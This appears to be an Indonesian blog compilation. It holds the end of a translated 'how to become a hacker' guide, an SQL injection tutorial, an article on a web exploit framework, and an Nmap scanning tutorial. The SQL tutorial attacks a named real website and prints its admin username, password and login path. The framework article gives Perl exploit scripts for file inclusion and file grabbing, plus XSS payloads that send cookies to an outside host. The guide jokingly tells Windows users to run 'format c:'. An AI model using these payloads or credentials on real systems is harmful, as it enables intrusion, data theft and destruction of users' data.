Demikian juga, dalam permainan hacker, Anda menjaga nilai terutama lewat pandangan hacker lain terhadap kemampuan Anda (inilah sebabnya Anda belum benar-benar seorang hacker sampai hacker-hacker lain dengan konsisten menyebut Anda seorang hacker). Kenyataan ini dikaburkan oleh citra hacking sebagai pekerjaan menyendiri; juga oleh tabu budaya hacker (yang kini perlahan-lahan menghilang namun masih tetap kuat) yang tidak mengakui bahwa ego atau pengesahan dari luar berpengaruh pada motivasi seseorang.

Tegasnya, dunia hacker merupakan apa yang disebut oleh para antropolog sebagai budaya memberi. Kedudukan dan reputasi tidak diperoleh dengan menguasai orang lain, atau dengan menjadi seseorang yang cantik, atau dengan memiliki sesuatu yang tidak dimiliki orang lain, tapi dengan memberikan sesuatu. Tepatnya, dengan memberikan waktu Anda, kreativitas, dan hasil dari kemampuan Anda.

Pada dasarnya ada lima hal yang bisa dilakukan agar dihormati oleh hacker:

5.1 Menulis software open-source.
Yang pertama (yang paling inti dan paling tradisional) adalah menulis program yang dipandang berguna atau mengasyikkan oleh hacker lain, kemudian memberikan source programnya untuk digunakan oleh seluruh budaya hacker.

(Dulu karya semacam ini disebut 'software bebas' (free software), tapi istilah ini memusingkan banyak orang karena mereka tidak tahu apa arti tepat dari 'free'. Sekarang banyak yang lebih menyukai istilah 'software open-source'.)

Para dewa yang dipuja di dunia hacker yaitu mereka yang telah menulis program besar yang berkemampuan tinggi dan dibutuhkan di mana-mana, lalu memberikan program ini cuma-cuma, dan sekarang program itu telah dipakai setiap orang.

5.2 Membantu menguji dan men-debug software open-source
Yang selanjutnya berjasa adalah mereka yang bertahan menggunakan dan men-debug software open-source. Di dunia yang tak sempurna ini, tanpa terhindarkan kita harus menghabiskan sebagian besar waktu pengembangan software dalam tahap debugging. Karena itu setiap penulis software open-source yang waras akan berpendapat bahwa penguji beta yang baik (yang tahu bagaimana menjelaskan gejala masalah dengan jelas, bagaimana melokalisir masalah, mampu mentolerir bug di rilis cepat, dan bersedia menjalankan beberapa rutin diagnostik sederhana) itu amat sangat berharga. Bahkan satu saja penguji beta sudah mampu membantu menjadikan tahap debugging dari mimpi buruk panjang yang melelahkan menjadi hanya gangguan yang justru menyehatkan.

Bila Anda seorang pemula, cobalah mencari program yang sedang dalam tahap pengembangan, yang menarik bagi Anda, dan jadilah seorang penguji beta yang baik. Dari sini Anda secara alamiah akan meningkat dari membantu menguji program ke membantu memodifikasi program. Anda akan belajar banyak, dan pada gilirannya nanti Anda pun akan memperoleh bantuan dari orang lain saat membutuhkan.

5.3 Menerbitkan informasi yang bermanfaat.
Yang bagus juga untuk dilakukan yaitu mengumpulkan dan menyaring informasi-informasi menarik dan berguna ke dalam halaman Web atau dokumen seperti FAQ (Frequently Asked Questions -- daftar jawaban pertanyaan-pertanyaan yang sering diajukan orang), dan membuat dokumen-dokumen ini mudah didapat orang.

Pemelihara FAQ teknis yang besar-besar juga mendapatkan hormat hampir seperti para penulis software open-source.

5.4 Membantu terus berjalannya infrastruktur.
Budaya hacker (dan juga dalam hal ini pengembangan rekayasa Internet) dijalankan oleh relawan. Banyak sekali pekerjaan yang dibutuhkan namun bukan pekerjaan yang agung, yang harus dilakukan agar semuanya tetap berjalan – melakukan administrasi mailing list, moderasi newsgroup, memelihara situs archive software yang besar, mengembangkan dokumen-dokumen RFC serta standar teknis lainnya.

Mereka yang melakukan hal-hal seperti dengan baik juga dihormati, karena orang tahu bahwa pekerjaan seperti ini menghabiskan banyak waktu dan kalah mengasyikkan dibanding bermain dengan kode. Melakukan pekerjaan seperti ini menunjukkan bahwa seseorang memiliki dedikasi.

5.5 Mengabdi kepada budaya hacker itu sendiri.
Terakhir, Anda dapat mengabdi dan menyebarluaskan budaya hacker (lewat, misalnya, menulis panduan tepat bagi pemula tentang cara menjadi seorang hacker :-)). Anda tidak bisa melakukan hal ini kecuali telah berkecimpung cukup lama dan menjadi figur yang cukup terkenal di salah satu dari empat hal sebelumnya.

Budaya hacker tidak persis memiliki pemimpin, tapi memiliki pahlawan, tetua suku, sejarawan, dan para jubir. Jika Anda telah cukup lama berada di 'medan tempur', Anda dapat saja memperoleh salah satu dari jabatan-jabatan ini. Peringatan: hacker tidak mempercayai ego tetua suku yang terlampau mencolok, jadi berbahaya jika Anda terlalu terlihat untuk berusaha menjadi terkenal. Cara yang benar seharusnya yaitu dengan memposisikan diri sedemikian rupa sehingga jabatan tersebut jelas telah Anda capai, lalu kemudian bersikap rendah hati dan ramah sehubungan dengan kedudukan Anda tersebut.

6. Hubungan Hacker/Orang Nyentrik2
Bertentangan dengan mitos populer, tidak perlu menjadi orang nyentrik untuk menjadi hacker. Meski itu sebetulnya membantu, dan pada kenyataannya banyak hacker yang merupakan orang nyentrik. Menjadi orang yang tersisih secara sosial membantu Anda tetap memusatkan perhatian pada hal-hal yang benar-benar penting, seperti berpikir dan hacking.

Karena alasan ini, banyak hacker mengadopsi label 'nerd' dan bahkan menggunakan istilah yang lebih kasar 'geek' sebagai lencana kebanggaan -- cara memproklamasikan kebebasan dari tuntutan sosial. Lihatlah The Geek Page untuk pembahasan menyeluruh.

Bila Anda tetap dapat memusatkan perhatian pada hacking sampai menjadi cukup ahli dan tetap memiliki kegiatan sosial, itu sah-sah saja. Hal ini memang lebih mudah dilakukan sekarang ketimbang waktu saya seorang pemula di tahun 1970-an; budaya mainstream saat ini jauh lebih ramah pada para techno-nerd. Malah kini semakin banyak orang yang menyadari bahwa hacker kadang merupakan kekasih yang berkualitas dan calon pasangan hidup potensial. Lebih lanjut tentang hal ini, lihat Girl's Guide to Geek Guys.

Bila ketertarikan Anda pada hacking adalah karena Anda tidak mempunyai kegiatan lain, itu juga tidak apa-apa -- setidaknya tidak perlu susah-susah memusatkan perhatian. Mudah-mudahan satu hari nanti Anda akan memperoleh kehidupan sosial.

7. Panduan Gaya
Saya ulangi, untuk menjadi hacker, Anda perlu memasuki cara pikir hacker. Hal-hal tertentu yang Anda lakukan saat jauh dari komputer kadang membantu mencapainya. Tentu saja kegiatan-kegiatan ini bukan sebagai pengganti hacking (tak ada yang dapat menggantikan hacking) tapi banyak hacker melakukannya, dan merasa bahwa kegiatan tersebut secara dasar berhubungan dengan intisari hacking.

Membaca karya fiksi ilmiah. Datang ke pertemuan fiksi ilmiah (salah satu jalan yang bagus untuk bertemu hacker dan proto-hacker).
Mempelajari Zen, dan/atau berlatih bela diri. (Disiplin mental yang diajarkan serupa dengan hacking dalam hal-hal penting.)
Mengasah pendengaran musik. Belajar menghargai jenis-jenis musik yang tidak lazim. Belajar menjadi ahli dalam bermain alat musik tertentu, atau berlatih bernyanyi.
Mengembangkan apresiasi akan permainan kata.
Belajar menulis dalam bahasa asli (Sejumlah banyak hacker, termasuk semua hacker terbaik yang saya kenal, adalah penulis yang cakap).
Semakin banyak dari hal-hal di atas yang sudah Anda kerjakan, semakin besar kemungkinan Anda adalah calon hacker berbakat. Kenapa hal-hal di atas yang berhubungan dengan hacking tidak sepenuhnya jelas, tapi semuanya berkaitan dengan gabungan kemampuan otak kiri dan kanan yang penting (hacker harus dapat berpikir logis dan juga sewaktu-waktu harus dapat melangkah keluar dari logika umum suatu permasalahan).

Terakhir, sebagian dari hal-hal yang tidak sebaiknya dilakukan:

Jangan menggunakan ID atau nama samaran yang konyol atau berlebihan.
Jangan terlibat perang flame di Usenet (atau di mana pun).
Jangan menggelari diri 'cyberpunk', jangan berurusan dengan para 'cyberpunk'.
Jangan mengirim posting atau email yang penuh salah ketik dan bertata bahasa buruk.
Satu-satunya reputasi yang akan Anda dapatkan jika melakukan hal-hal di atas adalah sebagai orang dungu. Ingatan hacker biasanya bagus -- mungkin dibutuhkan bertahun-tahun lamanya sebelum Anda dapat diterima kembali.

8. Bacaan Lain
Peter Seebach mengurus dokumen bagus Hacker FAQ bagi para manajer yang tidak tahu bagaimana harus berhadapan dengan para hacker.

Di Loginataka terdapat beberapa keterangan tentang latihan dan cara bersikap seorang hacker Unix yang benar.

Saya juga menulis A Brief History Of Hackerdom.

Saya menulis sebuah paper, The Cathedral and the Bazaar, yang menjelaskan banyak tentang cara kerja Linux dan budaya open-source. Topik ini saya bahas lebih tegas dalam kelanjutan paper tersebut, Homesteading the Noosphere.

Rick Moen menulis dokumen yang bagus tentang cara mengoperasikan kelompok pengguna Linux.

9. Tanya Jawab (FAQ)
T: Maukah Anda mengajari saya cara hacking?

J: Sejak pertama kali halaman ini diterbitkan online, setiap minggu (kadang setiap hari) saya mendapatkan beberapa permintaan dari orang agar saya 'mengajari hacking dari A-Z'. Sayangnya, saya tidak memiliki waktu atau tenaga untuk ini; proyek-proyek hacking saya telah menghabiskan 110% dari waktu saya.

Meski toh saya ajarkan, hacking adalah sikap dan kemampuan yang pada dasarnya harus dipelajari sendiri. Anda akan menyadari bahwa meskipun para hacker sejati bersedia membantu, mereka tidak akan menghargai Anda jika Anda minta disuapi segala hal yang mereka ketahui.

Pelajari dulu sedikit hal. Tunjukkan bahwa Anda telah berusaha, bahwa Anda mampu belajar mandiri. Barulah ajukan pertanyaan-pertanyaan spesifik pada hacker yang Anda jumpai.

Jika toh Anda mengirim email pada seorang hacker untuk meminta nasihat, ketahuilah dahulu dua hal. Pertama, kami telah menemukan bahwa orang-orang yang malas dan sembrono dalam menulis biasanya terlalu malas dan sembrono dalam berpikir sehingga tidak cocok menjadi hacker -- karena itu usahakanlah mengeja dengan benar, dan gunakan tata bahasa dan tanda baca yang baik, atau Anda tidak akan diacuhkan. Kedua, jangan berani-berani meminta agar jawaban dikirim ke alamat email lain yang berbeda dari alamat tempat Anda mengirim email; kami menemukan orang-orang ini biasanya pencuri yang memakai account curian, dan kami tidak berminat menghargai pencuri.

T: Jadi bagaimana cara memulai?

J: Cara terbaik adalah barangkali mengunjungi pertemuan KPLI (kelompok pengguna Linux) setempat. Anda dapat menemukan kelompok yang dimaksud di LDP General Linux Information Page; mungkin ada satu yang di dekat Anda, kemungkinan terkait dengan sebuah sekolah atau universitas. Anggota KPLI kemungkinan akan memberi Anda Linux jika Anda meminta, dan sudah pasti akan menolong Anda menginstall Linux dan mulai memakainya.

T: Kapan saya harus mulai? Apakah sudah terlambat?

J: Di usia mana pun saat Anda mulai termotivasi, itu usia yang baik. Kebanyakan orang mulai tertarik di usia 15 s.d. 20, tapi banyak perkecualian (lebih tua maupun lebih muda).

T: Berapa lama waktu yang dibutuhkan untuk belajar hacking?

J: Bergantung seberapa besar bakat dan usaha Anda. Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar dan menyempurnakan keahlian.

T: Apakah Visual Basic atau Delphi bahasa permulaan yang bagus?

J: Tidak, karena mereka tidak portabel. Belum ada implementasi open-source dari bahasa-bahasa ini, jadi Anda akan terkurung di platform yang dipilih oleh vendor. Menerima situasi monopoli seperti itu bukanlah cara hacker.

Visual Basic amat jelek. Fakta bahwa bahasa ini proprietary dari Microsoft sudah cukup untuk mendiskualifikasikannya, dan seperti halnya Basic-Basic yang lain, bahasa ini didisain dengan jelek dan akan mengajarkan kepada Anda kebiasaan-kebiasaan memrogram yang jelek.

T: Maukah Anda membantu saya meng-crack sistem ini, atau mengajari saya cara cracking?

J: Tidak. Jika orang masih mengajukan pertanyaan bodoh seperti di atas setelah membaca tulisan ini, berarti dia terlalu bodoh untuk dididik, meskipun saya memiliki waktu untuk mendidiknya. Setiap email kepada saya dengan permintaan semacam ini akan diabaikan atau dijawab dengan amat kasar.

T: Bagaimana cara mendapatkan password account orang lain?

J: Ini cracking. Pergi sana, bodoh.

T: Bagaimana cara menembus/membaca/memonitor email orang lain?

J: Ini cracking. Jauh-jauh sana, goblok.

T: Bagaimana cara mencuri privilege op chanel di IRC?

J: Ini cracking. Enyah kau, cretin. (Catatan: lihat Jargon File).

T: Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?

J: Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain yang setidaknya dirancang untuk keamanan.

T: Saya mengalami masalah dengan software Windows saya. Maukah Anda menolong?

J: Ya. Buka DOS prompt dengan ketikkan "format c:". Semua masalah yang Anda alami akan lenyap dalam beberapa menit.

T: Di mana tempat untuk bertemu dengan para hacker asli dan mengobrol dengan mereka?

Jalan terbaik yaitu dengan mencari kelompok pengguna Unix atau Linux di daerah Anda dan pergi ke pertemuan rutin mereka (sebagian daftar kelompok pengguna ini bisa dilihat di halaman LDP di Sunsite).

(Dulu saya pernah berkata bahwa di IRC Anda tidak akan berjumpa dengan hacker sejati, tapi sekarang saya mengerti bahwa kenyataan ini telah berubah. Nampaknya komunitas para hacker sejati, yang berhubungan dengan hal-hal seperti GIMP dan Perl, telah memiliki channel IRC masing-masing).

T: Bisakah Anda menganjurkan buku-buku yang berguna seputar hacking?

J: Saya memaintain Linux Reading List HOWTO yang mungkin berguna bagi Anda. Loginataka juga barangkali menarik buat Anda.

T: Apakah matematika saya harus bagus untuk menjadi hacker?

J: Tidak. Meskipun Anda perlu dapat berpikir logis dan mengikuti rantai pemikiran eksak, hacking hanya menggunakan sedikit sekali matematika formal atau aritmetika.

Anda terutama tidak perlu kalkulus atau analisis (kita serahkan itu kepada para insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool, teori himpunan hingga, kombinasi, dan teori graph) berguna.

T: Bahasa apa yang pertama-tama harus saya pelajari?

J: HTML, bila Anda belum menguasainya. Ada banyak buku HTML yang jelek, dengan sampul mengkilap dan penuh dengan kata-kata berlebih, sementara amat disayangkan jumlah buku yang bagus sedikit. Satu yang paling saya sukai yaitu HTML: The Definitive Guide.

Tapi HTML bukan bahasa pemrograman penuh. Bila Anda telah siap untuk memrogram, saya sarankan mulai dengan Python. Anda akan mendengar banyak orang menyarankan Perl, dan Perl saat ini masih lebih populer ketimbang Python, tapi Perl lebih sulit dipelajari.

C amat penting, tapi juga jauh lebih sulit daripada Python atau Perl. Jangan langsung belajar C untuk pertama kali.

T: Hardware seperti apa yang saya butuhkan?

J: Komputer pribadi (PC, personal computer) dulu kurang memiliki daya komputasi dan memori sedikit, sehingga membatasi proses belajar hacker. Sudah agak lama kenyataannya tidak lagi demikian. Setiap mesin mulai dari 486DX50 ke atas sudah lebih dari cukup untuk development, X, dan komunikasi Internet, dan harddisk terkecil yang bisa Anda beli sekarang sudah cukup besar.

Yang penting dalam memilih hardware adalah apakah kompatibel dengan Linux (atau BSD, jika Anda memilih OS itu). Lagi-lagi, hardware modern kebanyakan kompatibel; yang masih kurang banyak kompatibel adalah modem dan printer; beberapa mesin mengandung hardware yang spesifik Windows dan tidak akan bekerja dengan Linux.

Ada FAQ tentang kompatibilitas hardware, versi terakhirnya ada di sini.

T: Apakah saya harus membenci dan menjelek-jelekkan Microsoft?

J: Tidak perlu. Bukannya Microsoft itu menjijikkan, tapi sudah ada budaya hacker jauh sebelum Microsoft dan juga akan ada nanti setelah Microsoft menjadi sejarah. Energi yang Anda berikan untuk membenci Microsoft barangkali lebih baik dikerahkan untuk mencintai pekerjaan Anda. Tulislah kode yang bagus -- itu yang akan cukup menjelekkan Microsoft tanpa mengotori karma Anda.

T: Tapi bukankan dengan software open-source programer tidak akan dapat memperoleh nafkah?

J: Kemungkinan besar tidak -- sejauh ini, industri software open-source justru menciptakan ketimbang menghilangkan lapangan pekerjaan. Jika ditulisnya suatu program akan menciptakan keuntungan bersih secara ekonomi, seorang programer tetap akan memperoleh bayaran terlepas dari apakah programnya itu akan menjadi program bebas atau tidak. Dan, terlepas dari sebanyak apa pun software “bebas” yang telah ditulis, selalu ada kebutuhan akan aplikasi yang baru dan dibuat sesuai pesanan. Di halaman web Open Source, saya menulis lebih jauh tentang hal ini.

T: Bagaimana caranya mulai? Di mana saya bisa mendapatkan versi Unix bebas?

J: Di bagian lain tulisan ini saya telah memberi petunjuk tempatnya. Untuk menjadi hacker Anda memerlukan motivasi dan inisiatif dan kemampuan untuk belajar mandiri. Mulailah sekarang…

Footnote

1 Demigod, hacker yang telah memiliki pengalaman bertahun-tahun, memiliki reputasi kelas dunia, dan berperan penting dalam pengembangan rancangan, tool, atau game yang dipakai/dikenal oleh minimal separuh komunitas hacker (dari Jargon File 4.1.2).

2 Nerd, seseorang yang memiliki IQ di atas rata-rata, kurang mampu bercakap-cakap atau melakukan ritual sosial lainnya. (dari Jargon File 4.1.2).
Selengkapnya...

Hallo, bertemu kembali dengan saya, di tutorial yang kesekian kalinya, kali ini saya akan mencoba
mengajak anda untuk bersama-sama mengeksploitasi website yang memiliki bug SQL Injection.
Bug di X-Ice system ditemukan oleh Cyberghost beberapa hari yang lalu, tapi sampai saat ini masih banyak
vulnerability dari situs-situs yang masih bisa dimanfaatkan [red: exploitasi].
Ya, mungkin cukup sekian pengantarnya, terima kasih. Dadah... :)
Disini saya tidak akan menjelaskan secara detil bagaimana query didapatkan, karena butuh artikel lain
untuk membahasnya, dan saya pun masih dalam tahap pembelajaran, jadi maaf-maaf aja, tutorialnya kurang lengkap.
:)

Untuk mencari targetnya, silahkan menggunakan keyword yang tepat ...
ex : inurl:/devami.asp?id= geri

Korban yang saya dapatkan adalah :

http://www.radyopinarim.com/haber1/devami.asp?id=1

Untuk membuktikan websitenya vuln atau tidak anda bisa menghapus angka 1-nya.
Yang anda dapatkan adalah kurang lebih error yang seperti ini


Microsoft OLE DB Provider for ODBC Drivers hata '80040e14'

[Microsoft][ODBC Microsoft Access Sürücüsü] 'id=' sorgu ifadesi içindeki Sözdizimi hatasý (eksik iþleç)

/haber1/devami.asp, satýr 8


Dari sini silahkan tepuk tangan, karena anda masih bisa mengeksploitasi situs ini.
Untuk mencari username nya anda tinggal mengganti angka 1 dengan

-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

kurang lebih alamat di browser seperti ini :
http://www.radyopinarim.com/haber1/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin

Yang saya dapatkan usernamenya adalah Kadrius

dan untuk mencari passwordnya
:


-1+union+select+0,sifre,2,3,4,5,6,7+from+admin

passwordnya adalah 19901990

Untuk login sebagai admin anda tinggal balik kehalaman

/admin/kontrol.asp

Ya, sekian saja tutorial singkat penggunaan SQL Injection sebagai exploitasi bug X-Ice system.
Selamat mencoba, terima kasih.

(source: www.ilmuwebsite.com)
Selengkapnya...

Artikel ini membahas tentang suatu project pembuatan aplikasi yang
dapat digunakan untuk melakukan penetration testing / assessment
terhadap aplikasi yang di jalankan pada suatu web server (khususnya
aplikasi CMS)

Project Name : WebXploit Framework
Unique Name : w[x]f
Leader : y3dips
web : http://wxf.siteburg.com
member : 1 (still one)
License : GNU/GPL
Programming
language : PERL
OS : Independent
Descr i ption : Aplikasi yang dapat digunakan untuk melakukan
pen-test/assessment terhadap aplikasi web
-- web application exploit library ---
started : April 2005


------| Preface


Setelah mengunjungi event BCS'05[1], penulis semakin yakin untuk memulai
project ini, terutama setelah mendapatkan input dari world-class hackers.

"Saat ini target hacking sudah berubah dari sistem ke aplikasi."
-- Skyper, Phrack editor-in-chief

"95% perusahaan kena hack dari aplikasi web."
"3 dari 4 website vulnerable."
-- Shreeraj Shah, Net-Square founder
"Web Hacking: Attacks and Defense" author

"Dari statistik Zone-H, sebagian besar defacement terjadi karena
sistem yang tidak di-patch dan juga kelalaian admin."
-- Roberto Preatoni aka Sys64738, Zone-H founder

Secara lengkap, informasi mengenai BCS'05 dapat dilihat pada website
resminya[1] dan juga event summary[2] yang penulis buat.


------| Background


Semakin maraknya aksi hacking menggunakan web/http yang lebih dikenal
dengan istilah web-hacking membuat "w[x]f project" ini layak untuk
digarap serius.

Sebenarnya ide ini sudah lama terlintas saat penulis mulai belajar mencari
bugs/holes/vulnerabilities aplikasi web (khususnya CMS) dan dengan
beberapa jenis attack yang terdata (WATSC) ataupun tak terdata maka
terdapat pola untuk "metode penyerangan" dan "exploitasi" terhadap
aplikasi-aplikasi itu berbeda.


------| Basic Theory


Perhatikan beberapa advisories berikut ini:


---| I. PHP remote file inclusion


1. Remote Command Execution vulnerability in BBS E-Market Professional
[http://echo.or.id/adv/adv06-y3dips-2004.txt]

Vulnerabilities:
~~~~~~~~~~~~~~~~

Remote command execution on becommunity (modules that support by
BBSemarket professional) makes insecure calls to the include() function
of PHP (works on " pageurl= " functions) which can allow the inclusion
of remote files, and thereby the execution of arbitrary commands by
remote user with the web server user permissions, usually 'nobody' .

Exploit:
~~~~~~~~
http://[URL]/becommunity/community/index.php?pageurl=[evil file]


2. SocialMPN Remote File Inclusion
[http://waraxe.us/ftopic-542-0-days0-orderasc-.html]

# SocialMPN Remote File Inclusion
# 06/03/2005
# discovered by zer0-c00l (irc.BRASnet.org at #NMAP)
# or email (lucaszero [at] gmail [dot] com)
# Versions of SocialMPN affected: All versions.
# SocialMPN oficial site: www.socialmpn.com (Its vulnerable too)
# PS.: A lot of sites (maybe all sites) has SafeMode in PHP.

Exploit:
~~~~~~~~
http://[URL]/modules.php?name=[evil file]&file=article&sid=2


Untuk melakukan proses eksploitasi, kita dapat menggunakan scr i pt berikut..

<++> echo11-008/becommunity-exp.pl
#!/usr/bin/perl -w

require LWP::UserAgent;

if(@ARGV == 1)
{

$target= $ARGV[0];//http://[victim]/becommunity/community/index.php?pageurl=
$xploit= $ARGV[1];//http://[attacker]/cmd.txt

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

$url = "http://$target=$exploit";
my $injek = $ua->get($url);

print " -------------------------------\n";
if ($injek->is_success)
{ print $injek->content;}
else
{die $injek->status_line;}
print " -------------------------------\n";
}

else
{ print "Use: perl $0 [target] \n"; }
<--> echo11-008/becommunity.pl


---| II. XSS (Cross site scr i pting)


1. XSS on endonesia CMS

Exploit:
~~~~~~~~
http://[URL]/endon/mod.php?mod=publisher&op=search&query=%3Cscr i pt%
\3Ealert()%3C/scr i pt%3E


2. XSS on Exponent CMS

Exploit:
~~~~~~~~
http://[URL]/expo/index.php?action=createuser&module=%3Cscr i pt%3Ealert
\()%3C/scr i pt%3E


perhatikan kesamaan diantara dua metode eksplotasi diatas sehingga bisa kita
membuat formula seperti..

http://[URL]/[Vuln Path]=[XSS]

dan mengubah command dari alert(), menjadi
document.location='http://www.dummy.com/ambilkue.php?kue='+;

<++> echo11-008/ambilkue.php

<--> echo11-008/ambilkue.php

Selanjutnya tinggal menampilkan hasil dari file "catet.txt".


---| III. Information disclosure


1. Information Dislosure in SphpBlog
[http://echo.or.id/adv/adv12-y3dips-2005.txt]

Exploit:
~~~~~~~~
http://[Url]/sphpblog/config/password.txt
http://[Url]/sphpblog/config/config.txt

<<>>

http://[URL]/[Path]/[file]

Saya telah membuatkan scr i pt sederhana untuk grabbing isi file

<++> echo11-008/sphpblog-exp.pl
#!/usr/bin/perl -w

print "\n*Remote grabbing sphpblog password&config file by y3dips*\n";
require LWP::UserAgent;

if(@ARGV == 1)
{

$target= $ARGV[0];

my $ua = LWP::UserAgent->new;
$ua->agent("MSIE/6.0 Windows");
$ua->timeout(10);
$ua->env_proxy;

my @url = ("http://$target/config/password.txt",
\"http://$target/config/config.txt");

foreach my $urlz (@url) {
my $injek = $ua->get($urlz);
print "\n-------------------------------\n";
if ($injek->is_success)
{ print $injek->content;}
else
{die $injek->status_line;}
print "\n-------------------------------\n";

}
}
else {
print "Use: perl $0 [www.target.com] \n";
}

# EOF y3dips(c)2005
<--> echo11-008/sphpblog-exp.pl


---| IV. etc..

Masih banyak lagi jenis web vulnerabilites yang memiliki kesamaan dalam
metode pengexploitasiannya. Untuk info mengenai jenis vulnerabilities
web bisa melihat artikel yang dikeluarkan oleh www.webappsec.org

>>title : Web Application Security Consortium Threat Clasification
>>url : http://www.webappsec.org/projects/threat/v1/WASC-TC-v1_0.txt


------| Core System


Untuk tahap awal, w[x]f masih bersifat pasif -- hanya mengumpulkan informasi
terhadap aplikasi web beserta exploitnya, dan pada pengembangan lanjut,
w[x]f diharapkan dapat digunakan sebagai pentest//web assessment tool.

Adapun beberapa hal yang menjadi acuan :

0. Dibuat dengan bahasa pemrograman PERL (bisa di kembangkan dengan C)
1. Pengggunaan module LWP untuk menggantikan metode penggunaan socket
2. Penggunaan module untuk mempermudah manajemen penambahan exploit
3. Metasploit framework[3] untuk aplikasi contoh struktur dan interface
4. HTTrack untuk metode grabbing keseluruhan situs (pengembangan)
5. WIKTO untuk metode scanning dan google-hack (pengembangan)

simple Map


|(Use)
+-> - php injection ---+
- Xss |(choose)
- info Disc +-> - becommunity --+
- SQl injection - SocialMPN |(exploit)
- path traversal +-->Set Target URL
- [etc] Set Exploit URL
Set command*
(source: www.echo.or.id)
Selengkapnya...

Nmap adalah Tool untuk eksplorasi jaringan, secara ekslusif menjadi salah satu tool andalan yang sering digunakan oleh Administrator Jaringan, Pen-Test (IT Developer yg dibayar untuk mencari Hole pada System Jaringan) serta Attacker.
Tool ini digunakan sebagaimana namanya yaitu Penjelajah System Jaringan (Network Mapper, Network Exploration Tool). Dengan Nmap kamu bisa melakukan Probing (probe) keseluruh jaringan dan mencari tahu service apa yang aktif pada port yang lebih spesifik. Buka saja hanya itu tapi juga mencampur fingerprinting (Banner Grap) yang bisa membandingkan dan memberikan estimasi akan apa jenis Sistem Operasi (OS) target. Nmap juga mempunyai banyak kelebihan atau Flags yang akan memanipulasi bagaimana cara dia (Nmap) melakukan Scanning, kamu hanya perlu melakukan tcp()connect scanning yang akan membuat full connection ke host atau syn scanning juga biasa dikenal (a.k.a) Half Connection (ini susah negh jelasin half connection), testing Firewall atau mencari tahu apakan ada Firewall atau Packet Filter, Idle Scan (pembahasan mengenai Idle Scan, tunggu di Ezine selanjutnya yah...)yang akan melakukan Spoofing (menyembunyikan IP kamu) ke Host yang lain atau memakai Decoy (host umpan) yang akan membuat JeJaK (trace) kamu semakin susah dilacak.

Nmap kompetibel dengan Linux/BSD Family (*nix) dan W*ndows, walaupun aku akan menjelaskan penggunaan Nmap melalui Linux, tapi versi yang di W*ndows sama dengan yang di Linux.

Tambahan : aku memakai Linux Distro Debian dan Nmap v3.50 (http://www.insecure.org)

/* Pilihan dan Flags */

Nmap 3.50 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types (’*’ options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service & app names/versions
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: ‘1-1024,1080,6666,31337′
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don’t ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use ‘-’ for stdin
* -S /-e Specify source address or network interface
–interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.host-target.com 192.168.0.0/16 ‘192.88-90.*.*’

*****************************************************
* Syn/Stealth Scanning. -sS TCP SYN stealth port scan
*****************************************************
cyberzone:/home/vQ# nmap -sS 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 15:37 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
199/tcp open smux
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
593/tcp filtered http-rpc-epmap
993/tcp open imaps
995/tcp open pop3s
3128/tcp open squid-http
3306/tcp open mysql
6000/tcp open X11
Nmap run completed — 1 IP address (1 host up) scanned in 115.478 seconds

** Perhatikan port 135,137,138,139,445 dan 539 di filter, Biasanya port yang di Filter menjalankan firewall. **
******************************************************
* TCP()Connect Scanning. -sT TCP connect() port scan
******************************************************
cyberzone:/home/vQ# nmap -sT 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 15:50 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
199/tcp open smux
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
593/tcp filtered http-rpc-epmap
993/tcp open imaps
995/tcp open pop3s
3128/tcp open squid-http
3306/tcp open mysql
6000/tcp open X11
Nmap run completed — 1 IP address (1 host up) scanned in 41.839 seconds

